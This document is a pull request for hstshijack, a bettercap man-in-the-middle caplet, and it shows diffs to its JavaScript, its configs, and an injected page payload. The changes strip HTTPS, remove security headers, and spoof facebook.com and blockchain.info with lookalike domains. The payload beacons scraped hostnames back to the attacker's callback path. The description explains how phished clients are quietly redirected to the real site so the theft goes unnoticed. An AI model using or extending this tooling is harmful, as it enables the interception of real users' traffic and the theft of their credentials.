### PR TITLE
make hstshijack stealthier

### DIFF
--- a/hstshijack/README.md
+++ b/hstshijack/README.md
@@ -61,7 +61,7 @@ Example:
 hstshijack.custompayloads *:caplets/hstshijack/payloads/sslstrip.js,google.com:caplets/hstshijack/payloads/google.js,*.google.com:caplets/hstshijack/payloads/google.js
 ```
 
-Once the payload is injected into a page, you can technically phish any data unless the user navigates to a URL that either has strict transport security rules enforced by their browser, or the URL was not stripped due to JavaScript security.
+Once the payload is injected into a page, you can technically phish any data unless the client navigates to a URL that either has strict transport security rules enforced by their browser, or the URL was not stripped due to JavaScript security.
 
 <a href="./payloads/sslstrip.js">**sslstrip.js**</a> is included, which strips the `s` from all `https://` instances in `<a href="...` tags.
 
@@ -108,4 +108,6 @@ form.onsubmit = function() {
 
 The following POST request will be sniffed by bettercap, but not proxied. 
 
-Any instance of `obf_path_callback` will be replaced with the callback path that bettercap listens for (this can save time when writing JavaScript payloads).
+As soon as bettercap receives a callback, any request from the client for a spoofed hostname will immediately be redirected to the legitimate hostname, and any request for that targeted hostname will no longer be spoofed for this particular client.
+
+Note: Any instance of `obf_path_callback` will be replaced with the callback path that bettercap listens for (this can save time when writing JavaScript payloads).

--- a/hstshijack/README.md
+++ b/hstshijack/README.md
@@ -7,7 +7,7 @@
 ```sh
 set hstshijack.log             caplets/hstshijack/ssl.log
 set hstshijack.payload         caplets/hstshijack/payloads/hstshijack-payload.js
-set hstshijack.ignore          github.com,*.github.com
+set hstshijack.ignore          *
 set hstshijack.targets         blockchain.info,*.blockchain.info
 set hstshijack.replacements    blockchian.info,*.blockchian.info
 #set hstshijack.blockscripts    domain.com,*.domain.com

--- a/hstshijack/hstshijack.cap
+++ b/hstshijack/hstshijack.cap
@@ -2,7 +2,7 @@
 
 set hstshijack.log             caplets/hstshijack/ssl.log
 set hstshijack.payload         caplets/hstshijack/payloads/hstshijack-payload.js
-set hstshijack.ignore          github.com,*.github.com
+set hstshijack.ignore          *
 set hstshijack.targets         facebook.com,*.facebook.com
 set hstshijack.replacements    facedook.com,*.facedook.com
 set hstshijack.blockscripts    facebook.com,*.facebook.com

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -42,7 +42,7 @@ function randomString(length) {
 function wildcardToRegexp(string) {
 	string = string.replace(/\./g, "\\.")
 	string = string.replace(/\-/g, "\\-")
-	string = string.replace("*", "([a-z][a-z0-9\\-\\.]*)")
+	string = string.replace("*", "([a-z0-9\\-][a-z0-9\\-\\.]*)")
 	return new RegExp("^" + string + "$", "ig")
 }
 
@@ -63,19 +63,19 @@ function configure() {
 	block_script_hosts.indexOf("*") > -1 ? log_warn("(" + green + "hstshijack" + reset + ") Blocking scripts on every host will break most sites.") : ""
 	custom_payloads.length < 1 ? log_warn("(" + green + "hstshijack" + reset + ") Not setting a custom payload will cause many sites to break or alert the user.") : ""
 	for (var i = 0; i < ignore_hosts.length; i++) {
-		!ignore_hosts[i].match(/^[^0-9\-\.][\*]*[a-z0-9\-\.]*[a-z]+$/ig) ? log_fatal("(" + green + "hstshijack" + reset + ") Invalid hstshijack.ignore value (got " + ignore_hosts[i] + ").") : ""
+		!ignore_hosts[i].match(/^[^\.][\*]*[a-z0-9\-\.]*[a-z]+$/ig) ? log_fatal("(" + green + "hstshijack" + reset + ") Invalid hstshijack.ignore value (got " + ignore_hosts[i] + ").") : ""
 	}
 	for (var i = 0; i < target_hosts.length; i++) {
-		!target_hosts[i].match(/^[^0-9\-\.][\*]*[a-z0-9\-\.]*[a-z]+$/ig) ? log_fatal("(" + green + "hstshijack" + reset + ") Invalid hstshijack.targets value (got " + target_hosts[i] + ").") : ""
+		!target_hosts[i].match(/^[^\.][\*]*[a-z0-9\-\.]*[a-z]+$/ig) ? log_fatal("(" + green + "hstshijack" + reset + ") Invalid hstshijack.targets value (got " + target_hosts[i] + ").") : ""
 	}
 	for (var i = 0; i < replacement_hosts.length; i++) {
-		!replacement_hosts[i].match(/^[^0-9\-\.][\*]*[a-z0-9\-\.]*[a-z]+$/ig) ? log_fatal("(" + green + "hstshijack" + reset + ") Invalid hstshijack.replacements value (got " + replacement_hosts[i] + ").") : ""
+		!replacement_hosts[i].match(/^[^\.][\*]*[a-z0-9\-\.]*[a-z]+$/ig) ? log_fatal("(" + green + "hstshijack" + reset + ") Invalid hstshijack.replacements value (got " + replacement_hosts[i] + ").") : ""
 	}
 	for (var i = 0; i < block_script_hosts.length; i++) {
-		!block_script_hosts[i].match(/^[^0-9\-\.][\*]*[a-z0-9\-\.]*[a-z]+$/ig) ? log_fatal("(" + green + "hstshijack" + reset + ") Invalid hstshijack.blockscripts value (got " + block_script_hosts[i] + ").") : ""
+		!block_script_hosts[i].match(/^[^\.][\*]*[a-z0-9\-\.]*[a-z]+$/ig) ? log_fatal("(" + green + "hstshijack" + reset + ") Invalid hstshijack.blockscripts value (got " + block_script_hosts[i] + ").") : ""
 	}
 	for (var i = 0; i < custom_payloads.length; i++) {
-		!custom_payloads[i].match(/^[^0-9\-\.][\*]*[a-z0-9\-\.]*[\:].{1,}$/) ? log_fatal("(" + green + "hstshijack" + reset + ") Invalid hstshijack.custompayloads value (got " + custom_payloads[i] + ").") : ""
+		!custom_payloads[i].match(/^[^\.][\*]*[a-z0-9\-\.]*[\:].{1,}$/) ? log_fatal("(" + green + "hstshijack" + reset + ") Invalid hstshijack.custompayloads value (got " + custom_payloads[i] + ").") : ""
 		custom_payload_path = custom_payloads[i].replace(/.*\:/, "")
 		if ( !readFile(custom_payload_path) ) {
 			log_fatal("(" + green + "hstshijack" + reset + ") Could not read a path in hstshijack.custompayloads (got " + custom_payload_path + ").")

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -252,16 +252,22 @@ function onResponse(req, res) {
 			env("hstshijack.log") ? log_debug("(" + green + "hstshijack" + reset + ") Saved " + host + " to SSL log.") : ""
 		}
 	}
-	// Hijack this response if required
+	// Ignore this response if required
 	var ignored  = false
-	for (var i = 0; i < ignore_hosts.length; i++) {
-		regexp = wildcardToRegexp(ignore_hosts[i])
+	for (var a = 0; a < ignore_hosts.length; a++) {
+		regexp = wildcardToRegexp(ignore_hosts[a])
 		if ( req.Hostname.match(regexp) ) {
-			ignored = true
+			for (var b = 0; b < target_hosts.length; b++) {
+				regexp = wildcardToRegexp(target_hosts[b])
+				if ( !req.Hostname.match(regexp) ) {
+					ignored = true
+				}
+			}
 			i = ignore_hosts.length
 			log_debug("(" + green + "hstshijack" + reset + ") Ignored response from " + req.Hostname + ".")
 		}
 	}
+	// Hijack this response if required
 	if (!ignored) {
 		res.ReadBody()
 		// Strip location header

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -285,13 +285,24 @@ function onResponse(req, res) {
 	for (var a = 0; a < ignore_hosts.length; a++) {
 		regexp = wildcardToRegexp(ignore_hosts[a])
 		if ( req.Hostname.match(regexp) ) {
+			ignored = true
 			for (var b = 0; b < target_hosts.length; b++) {
-				regexp = wildcardToRegexp(target_hosts[b])
-				if ( !req.Hostname.match(regexp) ) {
-					ignored = true
-					i = ignore_hosts.length
-					log_debug("(" + green + "hstshijack" + reset + ") Ignored response from " + req.Hostname + ".")
+				if ( req.Hostname.match(regexp) ) {
+					ignored = false
+					b = target_hosts.length
 				}
+			}
+			for (var b = 0; b < custom_payloads.length; b++) {
+				custom_payload_host = custom_payloads[a].replace(/\:.*/, "")
+				regexp = wildcardToRegexp(custom_payload_host)
+				if ( req.Hostname.match(regexp) ) {
+					ignored = false
+					b = custom_payloads.length
+				}
+			}
+			if (ignored) {
+				log_debug("(" + green + "hstshijack" + reset + ") Ignored response from " + req.Hostname + ".")
+				a = ignore_hosts.length
 			}
 		}
 	}

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -324,7 +324,7 @@ function onResponse(req, res) {
 		}
 		// Strip meta tag redirection
 		if ( res.Body.match(/<meta(.*?)http\-equiv=(\'|\")refresh(\'|\")/ig) ) {
-			var meta_tags = res.Body.match(/<meta(.*?)http\-equiv=(\'|\")refresh(\'|\")(.*?)(\/|)\s*>/ig) || []
+			var meta_tags = res.Body.match(/<meta(.*?)http\-equiv=(\'|\")refresh(\'|\")(.*?)(\/\s*|)>/ig) || []
 			for (var a = 0; a < meta_tags.length; a++) {
 				if ( meta_tags[a].match(/https:\/\//ig) ) {
 					replacement = meta_tags[a].replace(/https:\/\//ig, "http://")

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -313,7 +313,7 @@ function onResponse(req, res) {
 		}
 		// Strip meta tag redirection
 		if ( res.Body.match(/<meta(.*?)http\-equiv=(\'|\")refresh(\'|\")/ig) ) {
-			var meta_tags = res.Body.match(/<meta(.*?)http\-equiv=(\'|\")refresh(\'|\")(.*?)\/\s*>/ig) || []
+			var meta_tags = res.Body.match(/<meta(.*?)http\-equiv=(\'|\")refresh(\'|\")(.*?)(\/|)\s*>/ig) || []
 			for (var a = 0; a < meta_tags.length; a++) {
 				if ( meta_tags[a].match(/https:\/\//ig) ) {
 					replacement = meta_tags[a].replace(/https:\/\//ig, "http://")

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -261,10 +261,10 @@ function onResponse(req, res) {
 				regexp = wildcardToRegexp(target_hosts[b])
 				if ( !req.Hostname.match(regexp) ) {
 					ignored = true
+					i = ignore_hosts.length
+					log_debug("(" + green + "hstshijack" + reset + ") Ignored response from " + req.Hostname + ".")
 				}
 			}
-			i = ignore_hosts.length
-			log_debug("(" + green + "hstshijack" + reset + ") Ignored response from " + req.Hostname + ".")
 		}
 	}
 	// Hijack this response if required

--- a/hstshijack/hstshijack.js
+++ b/hstshijack/hstshijack.js
@@ -390,7 +390,6 @@ function onResponse(req, res) {
 		res.RemoveHeader("X-XSS-Protection")
 		res.RemoveHeader("Expect-Ct")
 		// Set insecure headers
-		res.SetHeader("Allow-Access-From-Same-Origin", "*")
 		res.SetHeader("Access-Control-Allow-Origin", "*")
 		res.SetHeader("Access-Control-Allow-Methods", "*")
 		res.SetHeader("Access-Control-Allow-Headers", "*")

--- a/hstshijack/payloads/hstshijack-payload.js
+++ b/hstshijack/payloads/hstshijack-payload.js
@@ -2,7 +2,7 @@ var obf_var_callback_log = []
 
 function obf_func_callback(obf_var_data) {
 	obf_var_req = new XMLHttpRequest()
-	obf_var_req.open("GET", "http://" + location.host + "/obf_path_callback?" + obf_var_data, true)
+	obf_var_req.open("GET", "http://" + location.host + "/obf_path_ssl_log?" + obf_var_data, true)
 	obf_var_req.send()
 }
 
@@ -16,13 +16,12 @@ setInterval(function(){
 			}
 		})
 	}
-}, 666)
-
-self.addEventListener("load", function() {
 	obf_var_urls = document.body.innerHTML.match(/http(s|)\:\/\/[a-z0-9\.\-]{4,61}\.[a-z]{2,3}(:[0-9]{1,5}|)([\/][a-z0-9\-\.\/\,\_\~\!\$\&\'\(\)\*\+\;\=\:\@]*|)/ig)
 	for (var obf_var_i = 0; obf_var_i < obf_var_urls.length; obf_var_i++) {
 		obf_var_host = obf_var_urls[obf_var_i].replace(/http(s|)\:\/\//, "").replace(/\/.*/, "")
-		obf_var_callback_log.indexOf(obf_var_host) == -1 ? obf_func_callback(btoa(obf_var_urls[obf_var_i])) : ""
-		obf_var_callback_log.push(obf_var_host)
+		if (obf_var_callback_log.indexOf(obf_var_host) == -1) {
+			obf_func_callback(btoa(obf_var_host))
+			obf_var_callback_log.push(obf_var_host)
+		}
 	}
-})
+}, 666)


### PR DESCRIPTION
- We can now phish credentials by posting them to the callback path, and then stop spoofing that domain for the client that got phished. In other words, when the client's credentials get phished, and we give them a "wrong password" message, they will probably press the back button to try again. They will then be redirected to the legitimate hostname. Requests for this host will also no longer be spoofed for this client. (that was hard to word lol)
- We can now ignore all hostnames (with `hstshijack.ignore *`) except for specified (payload/hostname) targets.
- Regular expressions should now detect all valid domains.
- Fixed a pretty bad bug where the regular expression included "$1" in the hostname when no match was found.